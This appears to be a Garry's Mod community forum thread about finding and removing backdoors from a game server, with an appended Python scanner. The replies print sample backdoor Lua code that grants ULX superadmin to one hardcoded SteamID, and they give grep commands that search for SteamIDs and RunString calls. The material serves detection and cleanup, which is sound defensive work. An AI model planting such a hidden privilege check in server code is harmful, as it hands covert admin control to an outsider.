Garry's Mod

How to remove BACKDOOR ?

Submitted by Zebeub2000, Thread ID: 241506

Zebeub2000
29-04-2022, 08:25 PM
#1
I have a server and I have a backdoor so how to remove :(

RE: How to remove BACKDOOR ?

space_
06-05-2022, 04:29 AM
#2
Do you know what file it is located in?

Source Of Quote: https://mtxserv.com/gmod-server/doc/how-...or-on-gmod

To identify a backdoor, you have to look at all SteamIDs. For example:

AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)

That is not a backdoor. It's just the name of a legit player.


A backdoor looks like this:

2 - AUTHENT (Presence of Steam ID) addons/nestorro/lua/autorun/nestorro_launch.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then

If you have

ply:SteamID() == "STEAM_0:100000000") then

It's possibly a backdoor. You always have to check something like that! A backdoor can be something like:

if ( ply:SteamID() == "STEAM_0:1:00000000") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else

How to remove a backdoor?

To remove the entire backdoor, remove the code (which can look like this):

concommand.Add( "Nestor", function(ply)
    if ( ply:SteamID() == "STEAM_0:0:82261024") then
        RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
    else
        ply:ChatPrint("Bye " .. ply:Name() .. ".")
    end
end)

RE: How to remove BACKDOOR ?

GenaKiller1
07-05-2022, 08:20 AM
#3
To remove the entire backdoor, remove the code (which can look like this): Here comes the bus.

RE: How to remove BACKDOOR ?

Globungus
22-05-2022, 09:46 AM
This post was last modified: 22-05-2022, 10:29 AM by Globungus
#4
Good things to look for are SteamIDs, as mentioned. My preferred method is to search for any 17-digit numbers (SteamID 64) and STEAM_.
This can be accomplished with
Code:
# Print matching lines (17-digit SteamID64 or STEAM_), each followed by the file name
find ./ -type f -exec grep -E '[0-9]{17}|STEAM_' {} \; -print 2>/dev/null

For bytecode and other obfuscated code, try to search for RunString with
Code:
find ./ -exec grep 'RunString' {} \; -print 2>/dev/null
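
An added example, not part of any post in this thread: a Python scanner for the triage the replies describe. It separates a hardcoded SteamID comparison (the backdoor shape quoted above) from a SteamID that only appears in a credit line, and flags RunString calls. The function names, labels and sample file tree are constructed for illustration; the two SteamID lines are the ones quoted in the thread.

```python
import re
import tempfile
from pathlib import Path

# Patterns taken from the thread: STEAM_ IDs, 17-digit SteamID64s, RunString.
STEAM_ID = re.compile(r'STEAM_\d:\d:\d+|(?<!\d)\d{17}(?!\d)')
ID_COMPARE = re.compile(r'SteamID(?:64)?\s*\(\s*\)\s*[=~]=')
RUNSTRING = re.compile(r'\bRunString\s*\(')

def classify(line):
    """Label one Lua line: 'backdoor?', 'dynamic-code', 'id-only' or None."""
    has_id = STEAM_ID.search(line)
    if has_id and ID_COMPARE.search(line):
        return 'backdoor?'      # code branches on one hardcoded player
    if RUNSTRING.search(line):
        return 'dynamic-code'   # executes a string; review what feeds it
    if has_id:
        return 'id-only'        # e.g. an author credit in a comment
    return None

def scan(root):
    """Walk root for *.lua files; return sorted (path, line no, label)."""
    findings = []
    for path in Path(root).rglob('*.lua'):
        text = path.read_text(encoding='utf-8', errors='replace')
        for no, line in enumerate(text.splitlines(), 1):
            label = classify(line)
            if label:
                rel = path.relative_to(root).as_posix()
                findings.append((rel, no, label))
    return sorted(findings)

def demo():
    """Scan a constructed addon tree written to a temporary directory."""
    samples = {  # constructed files; paths are hypothetical
        'gamemodes/darkrp/cl_chat.lua':
            '-- Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)\n',
        'addons/x/lua/autorun/launch.lua':
            'print("hi")\nif ( ply:SteamID() == "STEAM_0:1:64045285") then\n',
        'addons/y/lua/autorun/load.lua': 'RunString(payload)\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding='utf-8')
        return scan(root)

if __name__ == '__main__':
    for path, no, label in demo():
        print(f'{label:13} {path}:{no}')
```

A 'backdoor?' or 'dynamic-code' label marks a line to read by hand; it is not a verdict.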
